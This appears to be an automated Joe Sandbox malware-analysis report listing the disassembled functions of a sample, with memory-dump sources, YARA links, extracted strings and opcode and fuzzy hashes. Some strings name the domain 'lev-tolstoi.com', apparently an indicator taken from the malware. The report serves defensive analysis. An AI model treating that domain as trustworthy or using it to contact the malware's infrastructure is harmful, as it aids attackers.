                                                                                                                                                                                                                                                                          Function 024BC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                                                          Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Function 024BC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                                                          Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                          Function 024BC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: e34893e954f569520b003ed65eb6b2666269d71f9a66198bcfee89c3a565cd48
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA1E67410C3818ED325CF29C4D07EBBBD6AFD2304F288A6ED4D98B291DB748449C762
                                                                                                                                                                                                                                                                          Function 0249D25A Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BI$ZG$lev-tolstoi.com$3ej$pr
                                                                                                                                                                                                                                                                          • API String ID: 0-2504283770
                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10
                                                                                                                                                                                                                                                                          Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                          Function 024AE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction ID: 5d87d7fef0fa45d6488f4942b86123d8a35a87a65476da76f2ddf5fbed33f6bb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E742177060C3908FD725DF28C86076FBBE1AFA6214F08867EE8E55B392D7358506CB52
                                                                                                                                                                                                                                                                          Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                          • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                          Function 024BB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                          • Instruction ID: 899687713e310fbb8661edb96a8ced5ba804bd98088320c005652a9a3bbfd9fe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0E1F87111D3C18AE765CF29C4517FBBBD6EF92208F18896EC4D987392DB39810AC722
                                                                                                                                                                                                                                                                          Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                          • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                          • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                          • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                          Function 00423410 Relevance: 5.4, Strings: 4, Instructions: 415COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                                          • API String ID: 0-1090792222
                                                                                                                                                                                                                                                                          • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                          • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                                          Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                          • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                          Function 024AC1AC Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                                          • API String ID: 0-2105564891
                                                                                                                                                                                                                                                                          • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                          • Instruction ID: 657f3f5a16ec7b1ccab67ace801a5480147cb96520a0ce904ebb7d75cae20789
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F81DCB264C3509FD308CFA9C85185FFBE2EFD1300F59886DE0E58B251D67996068B86
                                                                                                                                                                                                                                                                          Function 00435EA0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                          • Opcode ID: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                          • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                                          Function 024C6107 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                          • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                          • Instruction ID: e51913bc1318b489aaf54f115a6b062beab80a7ab95a7fa668834c0320ba49a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEA1053910C3908BC3549B3C985422FBBD65BC6328F2A8B2EE5E6473D2D675C585C707
                                                                                                                                                                                                                                                                          Function 0040DD25 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                          Function 0249DF8C Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: eff78ee87d626d3a0da557417c581b5285bdc2136f2726833c12f01c07caa04a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0A1DFB46087918FD726CF39C4A0A62BFE1EF57204B18869EC4D24FB66D339E406CB15
                                                                                                                                                                                                                                                                          Function 004156A0 Relevance: 4.4, Strings: 3, Instructions: 617COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                                          • API String ID: 0-2624003027
                                                                                                                                                                                                                                                                          • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                          • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                                                                                                                                                                                                                                          Function 004111E5 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$V$e
                                                                                                                                                                                                                                                                          • API String ID: 0-3964817793
